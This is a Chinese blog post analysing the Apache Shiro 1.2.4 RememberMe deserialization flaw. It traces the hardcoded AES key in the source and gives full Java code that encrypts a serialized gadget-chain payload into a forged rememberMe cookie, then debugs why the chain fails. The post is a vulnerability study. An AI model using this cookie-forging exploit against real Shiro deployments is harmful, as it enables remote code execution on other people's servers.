<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Shiro">
<meta property="og:type" content="article">
<meta property="og:title" content="Shiro反序列化漏洞分析">
<meta property="og:url" content="https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/index.html">
<meta property="og:site_name" content="3xsh0re&#39;Blog">
<meta property="og:description" content="Shiro">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007145311053.png">
<meta property="og:image" content="https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007145526167.png">
<meta property="og:image" content="https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007150104799.png">
<meta property="og:image" content="https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007151517794.png">
<meta property="og:image" content="https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007152036413.png">
<meta property="og:image" content="https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007154735878.png">
<meta property="og:image" content="https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007155328484.png">
<meta property="og:image" content="https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007161428002.png">
<meta property="og:image" content="https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007162215122.png">
<meta property="og:image" content="https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007162349828.png">
<meta property="og:image" content="https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241009154936376.png">
<meta property="og:image" content="https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241009160457347.png">
<meta property="og:image" content="https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241009160521557.png">
<meta property="og:image" content="https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241009192724018.png">
<meta property="og:image" content="https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241009193230826.png">
<meta property="og:image" content="https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241009194645589.png">
<meta property="og:image" content="https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241009200315744.png">
<meta property="article:published_time" content="2024-08-24T06:20:26.000Z">
<meta property="article:modified_time" content="2026-05-08T07:32:36.859Z">
<meta property="article:author" content="3xsh0re">
<meta property="article:tag" content="漏洞分析">
<meta property="article:tag" content="Java安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007145311053.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/logo2.png">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/logo2.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/logo2.png">
        
      
    
    <!-- title -->
    <title>Shiro反序列化漏洞分析</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"><style>mjx-container[jax="SVG"] {
  direction: ltr;
}

mjx-container[jax="SVG"] > svg {
  overflow: visible;
}

mjx-container[jax="SVG"][display="true"] {
  display: block;
  text-align: center;
  margin: 1em 0;
}

mjx-container[jax="SVG"][justify="left"] {
  text-align: left;
}

mjx-container[jax="SVG"][justify="right"] {
  text-align: right;
}

g[data-mml-node="merror"] > g {
  fill: red;
  stroke: red;
}

g[data-mml-node="merror"] > rect[data-background] {
  fill: yellow;
  stroke: none;
}

g[data-mml-node="mtable"] > line[data-line] {
  stroke-width: 70px;
  fill: none;
}

g[data-mml-node="mtable"] > rect[data-frame] {
  stroke-width: 70px;
  fill: none;
}

g[data-mml-node="mtable"] > .mjx-dashed {
  stroke-dasharray: 140;
}

g[data-mml-node="mtable"] > .mjx-dotted {
  stroke-linecap: round;
  stroke-dasharray: 0,140;
}

g[data-mml-node="mtable"] > svg {
  overflow: visible;
}

[jax="SVG"] mjx-tool {
  display: inline-block;
  position: relative;
  width: 0;
  height: 0;
}

[jax="SVG"] mjx-tool > mjx-tip {
  position: absolute;
  top: 0;
  left: 0;
}

mjx-tool > mjx-tip {
  display: inline-block;
  padding: .2em;
  border: 1px solid #888;
  font-size: 70%;
  background-color: #F8F8F8;
  color: black;
  box-shadow: 2px 2px 5px #AAAAAA;
}

g[data-mml-node="maction"][data-toggle] {
  cursor: pointer;
}

mjx-status {
  display: block;
  position: fixed;
  left: 1em;
  bottom: 1em;
  min-width: 25%;
  padding: .2em .4em;
  border: 1px solid #888;
  font-size: 90%;
  background-color: #F8F8F8;
  color: black;
}

foreignObject[data-mjx-xml] {
  font-family: initial;
  line-height: normal;
  overflow: visible;
}

.MathJax path {
  stroke-width: 3;
}

mjx-container[display="true"] {
  overflow: auto hidden;
}

mjx-container[display="true"] + br {
  display: none;
}
</style></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/3xsh0re">项目</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2024/09/04/URLDNS%E9%93%BE%E5%88%86%E6%9E%90/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2024/08/21/CB%E9%93%BE%E5%88%86%E6%9E%90/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/&text=Shiro反序列化漏洞分析"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/&title=Shiro反序列化漏洞分析"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/&is_video=false&description=Shiro反序列化漏洞分析"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Shiro反序列化漏洞分析&body=Check out this article: https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/&title=Shiro反序列化漏洞分析"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/&title=Shiro反序列化漏洞分析"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/&title=Shiro反序列化漏洞分析"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/&title=Shiro反序列化漏洞分析"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/&name=Shiro反序列化漏洞分析&description=&lt;p&gt;Shiro&lt;/p&gt;"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/&t=Shiro反序列化漏洞分析"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE%E7%8E%AF%E5%A2%83"><span class="toc-number">1.</span> <span class="toc-text">配置环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B0%83%E8%AF%95%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">调试分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#POC%E6%9E%84%E9%80%A0"><span class="toc-number">3.</span> <span class="toc-text">POC构造</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        Shiro反序列化漏洞分析
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">3xsh0re</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-08-24T06:20:26.000Z" class="dt-published" itemprop="datePublished">2024-08-24</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">漏洞分析</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/Java%E5%AE%89%E5%85%A8/" rel="tag">Java安全</a>, <a class="p-category" href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" rel="tag">漏洞分析</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p>Shiro</p>
<span id="more"></span>

<h3 id="配置环境"><a href="#配置环境" class="headerlink" title="配置环境"></a>配置环境</h3><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://github.com/apache/shiro.git</span><br><span class="line"><span class="built_in">cd</span> shiro</span><br><span class="line">git checkout shiro-root-1.2.4</span><br></pre></td></tr></table></figure>

<p>修改shiro/samples/web目录下的<code>pom.xml</code> 中<code>jstl版本为1.2</code>后更新maven</p>
<p><img src="/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007145311053.png"></p>
<h3 id="调试分析"><a href="#调试分析" class="headerlink" title="调试分析"></a>调试分析</h3><p>需要分析三个问题：</p>
<ul>
<li>为什么Shiro的RememberMe可以被伪造</li>
<li>为什么会触发反序列化漏洞</li>
<li>如何构造反序列化利用链</li>
</ul>
<p>启动Tomcat后，会自动跳转页面，点击到登陆页：</p>
<p><img src="/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007145526167.png"></p>
<p>勾选RememberMe，然后登陆抓包，</p>
<p><img src="/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007150104799.png"></p>
<p>显然这个remeberMe是AES加密，几个斜杠连接的。下面开始调试：</p>
<p>如果运行没报错但是调试报错了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Error opening zip file or JAR manifest missing : C:\JetBrains\IntelliJIdea2022.3\groovyHotSwap\gragent.jar</span><br></pre></td></tr></table></figure>

<p>可以在插件中禁用<code>groovy</code>插件解决</p>
<p>然后全局搜索cookie，找到<code>CookieRememberMeManager.java</code>，这个就是漏洞存在的地方</p>
<p><img src="/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007151517794.png"></p>
<p>看一下所有的函数，比较明显存在反序列化的地方有两个，</p>
<p><img src="/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007152036413.png"></p>
<p>根据这两个函数的释义，<code>getRememberedSerializedIdentity</code>方法大概率是用在反序列化cookie的时候，所以查看对它的调用，只有一处，在其这个类的父类<code>AbstractRememberMeManager</code>中，</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> PrincipalCollection <span class="title function_">getRememberedPrincipals</span><span class="params">(SubjectContext subjectContext)</span> {</span><br><span class="line">    <span class="type">PrincipalCollection</span> <span class="variable">principals</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line">    <span class="keyword">try</span> {</span><br><span class="line">        <span class="type">byte</span>[] bytes = getRememberedSerializedIdentity(subjectContext);</span><br><span class="line">        <span class="comment">//SHIRO-138 - only call convertBytesToPrincipals if bytes exist:</span></span><br><span class="line">        <span class="keyword">if</span> (bytes != <span class="literal">null</span> &amp;&amp; bytes.length &gt; <span class="number">0</span>) {</span><br><span class="line">            principals = convertBytesToPrincipals(bytes, subjectContext);</span><br><span class="line">        }</span><br><span class="line">    } <span class="keyword">catch</span> (RuntimeException re) {</span><br><span class="line">        principals = onRememberedPrincipalFailure(re, subjectContext);</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> principals;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>

<p>可以看到调用了这个方法后返回了一串byte，然后用于后续的<code>convertBytesToPrincipals</code>，可以看到这个方法对字节数组进行了先解密再反序列化，</p>
<p><img src="/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007154735878.png"></p>
<p>分析一下这个解密函数：使用了<code>CipherService</code>类解密，这是一个接口类，这里通过一个<code>getCipherService</code>方法得到一个实例，而这个实例本来就是<code>AbstractRememberMeManager</code>的一个私有成员变量；使用了<code>getDecryptionCipherKey</code>方法获取密钥，同样是返回一个私有成员变量。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="type">byte</span>[] decrypt(<span class="type">byte</span>[] encrypted) {</span><br><span class="line">    <span class="type">byte</span>[] serialized = encrypted;</span><br><span class="line">    <span class="type">CipherService</span> <span class="variable">cipherService</span> <span class="operator">=</span> getCipherService();</span><br><span class="line">    <span class="keyword">if</span> (cipherService != <span class="literal">null</span>) {</span><br><span class="line">        <span class="type">ByteSource</span> <span class="variable">byteSource</span> <span class="operator">=</span> cipherService.decrypt(encrypted, getDecryptionCipherKey());</span><br><span class="line">        serialized = byteSource.getBytes();</span><br><span class="line">    }</span><br><span class="line">    <span class="keyword">return</span> serialized;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>

<p>在实例化时便被赋值，确认为AES进行加密，然后下一行就是使用一个字节数组常量去初始化密钥，密钥也写在了这个类文件里面，AES是对称加密，所以加密和解密密钥是一样的。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="type">byte</span>[] DEFAULT_CIPHER_KEY_BYTES = Base64.decode(<span class="string">"kPH+bIxk5D2deZiIxcaaaA=="</span>);</span><br></pre></td></tr></table></figure>

<p><img src="/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007155328484.png"></p>
<p>分析到这里，就解决了为什么Shiro的RememberMe可以进行伪造的问题。</p>
<p>回到初次调用<code>decrypt</code>方法的地方，分析为什么触发反序列化漏洞，调用的是父类的<code>deserialize</code>方法，返回一个<code>PrincipalCollection</code>类的实例，这里的<code>getSerializer</code>是返回一个原生的<code>Serializer&lt;T&gt;</code>，然后调用其反序列化方法。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> PrincipalCollection <span class="title function_">deserialize</span><span class="params">(<span class="type">byte</span>[] serializedIdentity)</span> {</span><br><span class="line">    <span class="keyword">return</span> getSerializer().deserialize(serializedIdentity);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>

<p>在<code>AbstractRememberMeManager</code>的514行出下断点，然后调试，在页面登陆，记得删除原有的<code>JSESSIONID</code>，步进两步，就进入了默认的序列化类</p>
<p><img src="/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007161428002.png"></p>
<h3 id="POC构造"><a href="#POC构造" class="headerlink" title="POC构造"></a>POC构造</h3><p>这里用到一个IDEA的插件，帮我们分析依赖，MavenHelper，去插件搜索下载即可。下载完成后重启应用，打开对应Web应用的<code>pom.xml</code>，下面会多出一个依赖分析。可以发现这里虽然有CC依赖，但是只是在Test中，并不在实际Web应用中，我们需要Runtime和Compile的依赖。</p>
<p><img src="/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007162215122.png"></p>
<p>于是乎，发现了<code>CommonBeanUtils</code>包，CB链分析</p>
<p><img src="/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241007162349828.png"></p>
<p>这里就先用CB链来打了，至于CC链的打法后面单独写一篇。</p>
<p>这是Shiro中使用的配置：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="title function_">DefaultBlockCipherService</span><span class="params">(String algorithmName)</span> {</span><br><span class="line">    <span class="built_in">super</span>(algorithmName); <span class="comment">//AES</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">this</span>.modeName = OperationMode.CBC.name();</span><br><span class="line">    <span class="built_in">this</span>.paddingSchemeName = PaddingScheme.PKCS5.getTransformationName();</span><br><span class="line">    <span class="built_in">this</span>.blockSize = DEFAULT_BLOCK_SIZE; <span class="comment">//0 = use the JCA provider's default</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">this</span>.streamingModeName = OperationMode.CBC.name();</span><br><span class="line">    <span class="built_in">this</span>.streamingPaddingSchemeName = PaddingScheme.PKCS5.getTransformationName();</span><br><span class="line">    <span class="built_in">this</span>.streamingBlockSize = DEFAULT_STREAMING_BLOCK_SIZE;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>

<p>还需要注意最后将初始向量和EncPayload组合在一起：</p>
<p><img src="/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241009154936376.png"></p>
<p>仿造Shiro的来就行了：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">EncPayload</span> {</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="type">byte</span>[] encryptionCipherKey = Base64.getDecoder().decode(<span class="string">"kPH+bIxk5D2deZiIxcaaaA=="</span>);</span><br><span class="line">    <span class="comment">// 使用 ensureSecureRandom 生成随机 IV</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="type">byte</span>[] generateRandomIV(<span class="type">int</span> sizeInBits) {</span><br><span class="line">        <span class="type">int</span> <span class="variable">BITS_PER_BYTE</span> <span class="operator">=</span> <span class="number">8</span>;</span><br><span class="line">        <span class="type">int</span> <span class="variable">sizeInBytes</span> <span class="operator">=</span> sizeInBits / BITS_PER_BYTE; <span class="comment">// 将位数转为字节数</span></span><br><span class="line">        <span class="type">byte</span>[] ivBytes = <span class="keyword">new</span> <span class="title class_">byte</span>[sizeInBytes];</span><br><span class="line">        <span class="type">SecureRandom</span> <span class="variable">random</span> <span class="operator">=</span> ensureSecureRandom();</span><br><span class="line">        random.nextBytes(ivBytes); <span class="comment">// 生成随机字节的 IV</span></span><br><span class="line">        <span class="keyword">return</span> ivBytes;</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 确保使用安全的随机数生成器</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> SecureRandom <span class="title function_">ensureSecureRandom</span><span class="params">()</span> {</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">new</span> <span class="title class_">SecureRandom</span>(); <span class="comment">// SecureRandom 通常用于密码学操作</span></span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 加密方法</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="type">byte</span>[] encrypt(<span class="type">byte</span>[] data) <span class="keyword">throws</span> Exception {</span><br><span class="line">        <span class="comment">// 创建 AES 密钥规格</span></span><br><span class="line">        <span class="type">SecretKeySpec</span> <span class="variable">secretKey</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">SecretKeySpec</span>(encryptionCipherKey, <span class="string">"AES"</span>);</span><br><span class="line">        <span class="comment">// 随机生成一个 16 字节（128 位）的 IV</span></span><br><span class="line">        <span class="type">byte</span>[] iv = generateRandomIV(<span class="number">128</span>); <span class="comment">// 生成的 IV 长度为 128 位（16 字节）</span></span><br><span class="line">        <span class="type">IvParameterSpec</span> <span class="variable">ivParameterSpec</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">IvParameterSpec</span>(iv);</span><br><span class="line">        <span class="comment">// 获取 AES Cipher 实例，使用 CBC 模式和 PKCS5Padding 填充方式</span></span><br><span class="line">        <span class="type">Cipher</span> <span class="variable">cipher</span> <span class="operator">=</span> Cipher.getInstance(<span class="string">"AES/CBC/PKCS5Padding"</span>);</span><br><span class="line">        <span class="comment">// 初始化 Cipher 为加密模式，并传入密钥和 IV</span></span><br><span class="line">        cipher.init(Cipher.ENCRYPT_MODE, secretKey, ivParameterSpec);</span><br><span class="line">        <span class="type">byte</span>[] encryptedData = cipher.doFinal(data);</span><br><span class="line">        <span class="comment">// 创建一个包含 IV 和加密数据的新数组</span></span><br><span class="line">        <span class="type">byte</span>[] output = <span class="keyword">new</span> <span class="title class_">byte</span>[iv.length + encryptedData.length];</span><br><span class="line">        <span class="comment">// 复制 IV 到输出数组的前 16 个字节</span></span><br><span class="line">        System.arraycopy(iv, <span class="number">0</span>, output, <span class="number">0</span>, iv.length);</span><br><span class="line">        <span class="comment">// 复制加密数据到输出数组的后续部分</span></span><br><span class="line">        System.arraycopy(encryptedData, <span class="number">0</span>, output, iv.length, encryptedData.length);</span><br><span class="line">        <span class="comment">// 返回包含 IV 和加密数据的字节数组</span></span><br><span class="line">        <span class="keyword">return</span> output;</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="type">byte</span>[] readFileToByteArray(String filePath) <span class="keyword">throws</span> IOException {</span><br><span class="line">        <span class="type">File</span> <span class="variable">file</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">File</span>(filePath);</span><br><span class="line">        <span class="type">byte</span>[] byteArray = <span class="keyword">new</span> <span class="title class_">byte</span>[(<span class="type">int</span>) file.length()]; <span class="comment">// 根据文件大小初始化字节数组</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span> (<span class="type">FileInputStream</span> <span class="variable">fis</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">FileInputStream</span>(file)) {</span><br><span class="line">            <span class="type">int</span> <span class="variable">bytesRead</span> <span class="operator">=</span> fis.read(byteArray); <span class="comment">// 读取文件内容到字节数组</span></span><br><span class="line">            <span class="keyword">if</span> (bytesRead != byteArray.length) {</span><br><span class="line">                <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">IOException</span>(<span class="string">"Could not completely read the file: "</span> + filePath);</span><br><span class="line">            }</span><br><span class="line">        }</span><br><span class="line">        <span class="keyword">return</span> byteArray;</span><br><span class="line">    }</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">getPOC</span><span class="params">(String fileName)</span> <span class="keyword">throws</span> Exception {</span><br><span class="line">        <span class="type">byte</span>[] bytes = encrypt(readFileToByteArray(fileName));</span><br><span class="line">        System.out.println(Base64.getEncoder().encodeToString(bytes) + <span class="string">"\nPocLength:"</span> + bytes.length);</span><br><span class="line">    }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>

<p>然后将上次写好的CB链放进去加密一下，</p>
<p><img src="/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241009160457347.png"></p>
<p>重发请求包：注意这里要删除之前获得的<code>JSESSIONID</code>，否则不会重新验证<code>rememberMe</code></p>
<p><img src="/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241009160521557.png"></p>
<p>然后，没弹出计算器，去看看Shiro报错，没有出现解密相关的报错说明加密写的没有问题</p>
<p><img src="/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241009192724018.png"></p>
<p>为什么会出现CC的依赖呢，去看一下<code>BeanComparator</code>的内容，确实依赖的CC库，在没有指定比较器时默认配置了<code>ComparableComparator</code></p>
<p><img src="/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241009193230826.png"></p>
<p>显然这里没有CC的依赖，如何解决，是否能有一个类可以替代<code>ComparableComparator</code></p>
<p>分析一下需要满足的条件：</p>
<ul>
<li>不依赖CC库，就是jdk/shiro/CB中带有的</li>
<li>需要<code>implements Comparator,Serializable</code></li>
<li>兼容性强，意思就是长时间没有迭代更新的</li>
</ul>
<p>怎么去找呢，在IDEA中ctrl+h可以看哪些类实现了接口，如图：</p>
<p><img src="/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241009194645589.png"></p>
